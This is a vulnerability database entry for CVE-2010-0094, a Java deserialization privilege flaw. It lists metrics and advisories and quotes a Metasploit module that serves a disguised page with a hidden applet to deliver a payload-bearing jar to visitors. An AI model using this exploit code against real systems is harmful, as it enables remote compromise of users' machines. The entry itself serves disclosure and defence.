CVE-2010-0094 : Detail

91.61%V3
Network
2010-04-01 14h00 +00:00
2018-10-10 16h57 +00:00

CVE Descriptions

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18 and 5.0 Update 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is due to missing privilege checks during deserialization of RMIConnectionImpl objects, which allows remote attackers to call system-level Java functions via the ClassLoader of a constructor that is being deserialized.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No information.

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.5 | | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 16305

Publication date : 2010-09-26 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

```ruby
##
# $Id: java_rmi_connection_impl.rb 10490 2010-09-27 00:09:17Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #
  # Superceded by java_trusted_chain
  #
  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java RMIConnectionImpl Deserialization Privilege Escalation Exploit',
      'Description'    => %q{
          This module exploits a vulnerability in the Java Runtime Environment
        that allows to deserialize a MarshalledObject containing a custom
        classloader under a privileged context. The vulnerability affects
        version 6 prior to update 19 and version 5 prior to update 23.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sami Koivu',      # Discovery
          'Matthias Kaiser', # PoC
          'egypt'            # metasploit module
        ],
      'Version'        => '$Revision: 10490 $',
      'References'     =>
        [
          [ 'CVE', '2010-0094' ],
          [ 'OSVDB', '63484' ],
          [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html' ],
        ],
      'Platform'       => [ 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 31 2010'
    ))
  end

  def on_request_uri( cli, request )
    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      print_status("Handling request from #{cli.peerhost}:#{cli.peerport}...")

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    paths = [
      [ "Exploit.class" ],
      [ "Exploit$1.class" ],
      [ "Exploit$1$1.class" ],
      [ "Exploit$2.class" ],
      [ "Payloader.class" ],
      [ "PayloadClassLoader.class" ],
      [ "payload.ser" ],
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0,idx].join("/") + "/"
        if !(jar.entries.map{|e|e.name}.include?(full))
          jar.add_file(full, '')
        end
      end
      fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2010-0094", path ), "rb")
      data = fd.read(fd.stat.size)
      jar.add_file(path.join("/"), data)
      fd.close
    end

    print_status("#{self.name} Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...")
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

    handler(cli)
  end

  def generate_html
    html  = "<html><head><title>Loading, Please Wait...</title></head>"
    html += "<body><center><p>Loading, Please Wait...</p></center>"
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
    html += "</applet></body></html>"
    return html
  end

end
```

Products Mentioned

Configuration 0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Configuration 0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

References

http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/39317
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0383.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/40545
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1454
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/39819
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1107
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2010-0338.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/1793
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43308
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=127557596201693&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.redhat.com/support/errata/RHSA-2010-0339.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/39292
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT4170
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/39659
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0471.html
Tags : vendor-advisory, x_refsource_REDHAT
http://ubuntu.com/usn/usn-923-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.redhat.com/support/errata/RHSA-2010-0337.html
Tags : vendor-advisory, x_refsource_REDHAT
http://support.apple.com/kb/HT4171
Tags : x_refsource_CONFIRM
http://www.mandriva.com/security/advisories?name=MDVSA-2010:084
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.vupen.com/english/advisories/2010/1191
Tags : vdb-entry, x_refsource_VUPEN